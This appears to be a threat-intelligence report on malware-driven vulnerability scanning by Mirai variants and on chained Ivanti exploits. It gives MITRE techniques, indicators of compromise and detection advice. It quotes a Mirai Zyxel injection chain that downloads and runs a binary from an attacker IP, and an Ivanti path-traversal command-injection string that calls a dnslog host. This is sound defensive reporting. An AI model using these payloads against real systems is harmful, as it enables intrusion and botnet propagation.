It Was Not Me! Malware-Initiated Vulnerability Scanning Is on the Rise

Malware-initiated scanning is increasing: compromised hosts are being instructed via C2 to perform large-volume scans and exploit attempts across many targets. Notable examples include Mirai-driven scans that download and execute payloads and chained Ivanti exploits that use path traversal to bypass authentication. #Mirai #MOVEit

Keypoints

Threat actors increasingly use infected hosts to perform distributed scanning rather than scanning directly from attacker infrastructure.
Malware on compromised devices beacons to C2 domains, receives scan instructions, and issues high-volume HTTP requests to many destinations.
Attackers embed previously unseen payload or C2 URLs inside exploit requests to evade vendor blocking and extend the time before payload/C2 detection.
Mirai variants carried scanning payloads (e.g., skyljne.mips/mips), hosted on multiple IPs, and used wget/chmod/execute chains to install and run binaries.
Ivanti vulnerabilities were exploited in chained attacks that used path traversal to bypass authentication and perform command injection, exfiltrating victim IPs via dnslog domains.
Telemetry-based detection looks for unusually high request volumes and repeated benign-looking paths (e.g., guestaccess.aspx) to identify scanning activity.

MITRE Techniques

[T1595] Active Scanning – Malware on compromised hosts initiates scanning requests to identify vulnerable targets (‘…the malware on the compromised device initiates scanning requests to various target domains.’)
[T1190] Exploit Public-Facing Application – Attackers sent exploit requests targeting MOVEit and other CVEs to trigger remote code execution (‘…attempt to scan for and subsequently exploit the MOVEit vulnerability CVE-2023-34362.’)
[T1105] Ingress Tool Transfer – Payloads were hosted on attacker-controlled URLs and downloaded/executed on targets using wget/chmod/execute sequences (‘…wget hxxp://103.110.33[.]164/mips; chmod 777 mips; ./mips’).
[T1071] Application Layer Protocol – Compromised devices beacon to attacker-controlled C2 domains to receive scan instructions (‘…this malware beacons to attacker-controlled C2 domains for instructions.’)
[T1190] Exploit Public-Facing Application – Attackers used path traversal to bypass authentication and trigger command injection on Ivanti endpoints (‘…/api/v1/totp/user-backup-code/../../license/keys-status;’).

Indicators of Compromise

[IP addresses] Mirai hosting/C2 context – 45.66.230[.]32, 193.47.61[.]75, and 16 more IPs associated with Mirai payload hosting and C2.
[File hash] Mirai sample – 23190d722ba3fe97d859bd9b086ff33a14ae9aecfc8a2c3427623f93de3d3b14 (SHA256) used to identify the Mirai variant.
[Domains/URLs] Ivanti and payload delivery context – hxxp://45.130.22[.]219/ivanti.js, dnslog[.]store (used to collect victim IPs), and 137.220.130[.]2/doc.
[File paths / payload names] Exploit/download patterns – bin/zhttpd/…wget…/mips (Mirai Zyxel exploit pattern), 103.245.236[.]188/skyljne.mips, and 103.110.33[.]164/mips.

Malware-driven scanning follows a simple operational procedure: an adversary compromises a host, the implanted malware beacons to attacker-controlled C2 infrastructure, and the C2 issues scan/exploit instructions. Infected devices then generate high-volume requests—often to many distinct destinations—using benign-looking paths (for example guestaccess.aspx tied to MOVEit scans) or exploit-specific URL patterns. This distributed scanning model helps attackers obscure origin, bypass geofencing, and scale scanning throughput beyond what a single attacker-controlled IP could achieve.

Attackers commonly embed fresh payload or C2 URLs directly inside exploit requests to reduce chances of early blocking by security vendors. Observed Mirai behavior includes downloading architecture-specific binaries and executing them via command chains such as: bin/zhttpd/${ifs}cd${ifs}/tmp;${ifs}rm${ifs}-rf${ifs}*;${ifs}wget${ifs}hxxp://103.110.33[.]164/mips;${ifs}chmod${ifs}777${ifs}mips;${ifs}./mips${ifs}zyxel.selfrep;. A Mirai sample (SHA256: 23190d7…) connected to C2 at 193.47.61[.]75 and then performed scanning; other Mirai-hosting IPs include 45.66.230[.]32 and 103.110.33[.]164. These sequences demonstrate ingress tool transfer (download + execute) and subsequent propagation attempts.

Chained exploitation was also observed against Ivanti products: attackers used a path traversal GET to bypass an authentication prefix check and reach a command-injectable endpoint, e.g. ‘/api/v1/totp/user-backup-code/../../license/keys-status;<attacker_cmd>’. The injected command attempted to contact a dnslog domain (a0f0b2e6[.]dnslog[.]store) to capture victim IPs for follow-up activity. Detecting and blocking the initial scanning requests—by flagging anomalous request volumes, repeated benign-looking endpoints across many destinations, or exploit-specific URL patterns—provides the earliest opportunity to disrupt these infection and payload-delivery chains.